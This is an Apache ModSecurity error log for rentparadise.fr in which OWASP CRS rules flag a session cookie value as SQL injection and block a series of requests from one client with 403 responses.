[Tue May 12 03:58:41.422948 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUbvMumyrWMfSu7q-5AAAANM"]
[Tue May 12 03:58:41.423153 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUbvMumyrWMfSu7q-5AAAANM"]
[Tue May 12 03:58:42.017974 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJUbvMumyrWMfSu7q-5AAAANM"]
[Tue May 12 03:58:42.330441 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/core"] [unique_id "agKJUrOxS7i6i_mT2NLf2QAAAEE"]
[Tue May 12 03:58:42.330637 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/core"] [unique_id "agKJUrOxS7i6i_mT2NLf2QAAAEE"]
[Tue May 12 03:58:42.330853 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUrOxS7i6i_mT2NLf2QAAAEE"]
[Tue May 12 03:58:42.509722 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUrvMumyrWMfSu7q-6gAAANM"]
[Tue May 12 03:58:42.509940 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJUrvMumyrWMfSu7q-6gAAANM"]
[Tue May 12 03:58:43.173392 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJUrvMumyrWMfSu7q-6gAAANM"]
[Tue May 12 03:58:43.362771 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/current"] [unique_id "agKJU7OxS7i6i_mT2NLf4AAAAEE"]
[Tue May 12 03:58:43.362983 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/current"] [unique_id "agKJU7OxS7i6i_mT2NLf4AAAAEE"]
[Tue May 12 03:58:43.363199 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJU7OxS7i6i_mT2NLf4AAAAEE"]
[Tue May 12 03:58:43.670747 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJU7vMumyrWMfSu7q-8AAAANM"]
[Tue May 12 03:58:43.671057 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJU7vMumyrWMfSu7q-8AAAANM"]
[Tue May 12 03:58:44.271770 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJU7vMumyrWMfSu7q-8AAAANM"]
[Tue May 12 03:58:44.468886 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/dist"] [unique_id "agKJVLOxS7i6i_mT2NLf4QAAAEE"]
[Tue May 12 03:58:44.469090 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/dist"] [unique_id "agKJVLOxS7i6i_mT2NLf4QAAAEE"]
[Tue May 12 03:58:44.469291 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVLOxS7i6i_mT2NLf4QAAAEE"]
[Tue May 12 03:58:44.700589 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVLvMumyrWMfSu7q-8gAAANM"]
[Tue May 12 03:58:44.700794 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVLvMumyrWMfSu7q-8gAAANM"]
[Tue May 12 03:58:45.295722 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJVLvMumyrWMfSu7q-8gAAANM"]
[Tue May 12 03:58:45.488557 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/front"] [unique_id "agKJVbOxS7i6i_mT2NLf5AAAAEE"]
[Tue May 12 03:58:45.488782 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/front"] [unique_id "agKJVbOxS7i6i_mT2NLf5AAAAEE"]
[Tue May 12 03:58:45.489006 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVbOxS7i6i_mT2NLf5AAAAEE"]
[Tue May 12 03:58:45.962916 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVbvMumyrWMfSu7q-9AAAANM"]
[Tue May 12 03:58:45.963118 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVbvMumyrWMfSu7q-9AAAANM"]
[Tue May 12 03:58:46.540954 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJVbvMumyrWMfSu7q-9AAAANM"]
[Tue May 12 03:58:46.722784 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/frontend"] [unique_id "agKJVrOxS7i6i_mT2NLf5QAAAEE"]
[Tue May 12 03:58:46.722991 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/frontend"] [unique_id "agKJVrOxS7i6i_mT2NLf5QAAAEE"]
[Tue May 12 03:58:46.723208 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVrOxS7i6i_mT2NLf5QAAAEE"]
[Tue May 12 03:58:46.960635 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVrvMumyrWMfSu7q-9QAAANM"]
[Tue May 12 03:58:46.960837 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJVrvMumyrWMfSu7q-9QAAANM"]
[Tue May 12 03:58:47.559150 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJVrvMumyrWMfSu7q-9QAAANM"]
[Tue May 12 03:58:48.029493 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/html"] [unique_id "agKJWLOxS7i6i_mT2NLf6AAAAEE"]
[Tue May 12 03:58:48.029691 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/html"] [unique_id "agKJWLOxS7i6i_mT2NLf6AAAAEE"]
[Tue May 12 03:58:48.029885 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJWLOxS7i6i_mT2NLf6AAAAEE"]
[Tue May 12 03:58:48.717388 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJWLvMumyrWMfSu7q-9wAAANM"]
[Tue May 12 03:58:48.717597 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJWLvMumyrWMfSu7q-9wAAANM"]
